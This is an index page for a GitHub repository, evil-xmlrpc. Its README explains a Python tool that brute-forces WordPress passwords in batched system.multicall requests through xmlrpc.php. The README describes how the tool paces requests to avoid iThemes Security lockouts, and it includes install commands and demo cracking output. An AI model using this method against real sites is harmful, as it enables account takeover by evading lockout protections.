Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Subn0x/evil-xmlrpc
evil-xmlrpc is a tool that I created to help me bruteforce Wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts
https://github.com/Subn0x/evil-xmlrpc
exploit ithemes-security python wordpress
Last synced: 3 months ago
JSON representation
evil-xmlrpc is a tool that I created to help me bruteforce Wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts
- Host: GitHub
- URL: https://github.com/Subn0x/evil-xmlrpc
- Owner: Subn0x
- Created: 2022-04-29T14:31:02.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-05-03T12:57:43.000Z (over 2 years ago)
- Last Synced: 2024-07-30T14:18:29.212Z (5 months ago)
- Topics: exploit, ithemes-security, python, wordpress
- Language: Python
- Homepage:
- Size: 25.4 KB
- Stars: 6
- Watchers: 1
- Forks: 6
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Subn0x/evil-xmlrpc - evil-xmlrpc is a tool that I created to help me bruteforce Wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts (Python)
README
# evil-xmlrpc
evil-xmlrpc is a tool that I created to help me bruteforce wordpress user accounts using xmlrpc.php while bypassing iThemes Security preventing lockouts
While testing a specific target I noticed that xmlrpc was enabled, but after sending a few requests against a discovered user account, I was locked out of the site. After waiting till the lockout period ended I saw that iThemes Security Plugin was being used on the site. I soon noticed that I was completely locked out after sending 5 requests. Regular bruteforce methods which invloved sending requests that contain only a single username and password per request wasn't going to work here. Later I discovered that you could send many login attempts via 1 single request using "system.multicall". In my particular situation I found that I could only send 1666 login attempts per request at a time (may be different for your target). So I made this script to be able to take a password list (of about 1 million words) and send it off in groups of 1664 (Initially was 1666 in the script, but cut it back by 2 for breathing room).
For example:
* Request 1 (Sends lines 1-1666 of wordlist)
* Request 2 (Sends lines 1667-3332 of wordlist)
* Request 3 (Sends lines 3333-4998 of wordlist)
* Request 4 (Sends lines 4999-6664 of wordlist)
Before sending the 5th request in order to prevent being locked out of the site, stop for 5 mins and then continue going down the list.
## Install
```sh
git clone https://github.com/0xApt/evil-xmlrpc.git
cd evil-xmlrpc
pip3 install -r requirements.txt
python3 evil-xmlrpc.py
```
## Demo output
```sh
root@user:~ python3 evil-xmlrpc.py 100000-pass-wordlist.txt admin https://www.examplesite.com
██ ▀██ ▀██
▄▄▄▄ ▄▄▄▄ ▄▄▄ ▄▄▄ ██ ▄▄▄ ▄▄▄ ▄▄ ▄▄ ▄▄ ██ ▄▄▄ ▄▄ ▄▄▄ ▄▄▄ ▄▄▄▄
▄█▄▄▄██ ▀█▄ █ ██ ██ ▀█▄▄▀ ██ ██ ██ ██ ██▀ ▀▀ ██▀ ██ ▄█ ▀▀
██ ▀█▄█ ██ ██ ▄█▄ ██ ██ ██ ██ ██ ██ █ ██
▀█▄▄▄▀ ▀█ ▄██▄ ▄██▄ ▄█ ██▄ ▄██ ██ ██▄ ▄██▄ ▄██▄ ██▄▄▄▀ ▀█▄▄▄▀
██
▀▀▀▀
By 0xapt
[*] Checking if site is vulnerable..
[*] Site is vulnerable!
[*] File has 100000 lines
[*] Sending Payload..
[*] Attempt: 1
[*] Target User: admin
[*] Using lines 0 to 1664 from password list
[*] Content Length: 356283
[*] Interesting.. Saving response..
[*] Password Not Cracked.
[*] Sending Payload..
[*] Attempt: 2
[*] Target User: admin
[*] Using lines 1665 to 3328 from password list
[*] Content Length: 356069
[*] Password Not Cracked.
[*] Sending Payload..
[*] Attempt: 3
[*] Target User: admin
[*] Using lines 3329 to 4992 from password list
[*] Content Length: 356069
[*] Password Not Cracked.
[*] Sending Payload..
[*] Attempt: 4
[*] Target User: admin
[*] Using lines 4993 to 6656 from password list
[*] Content Length: 356069
[*] Password Not Cracked.
[*] Waiting 5 mins to prevent lockout...
[*] Till next requests: 3:24
```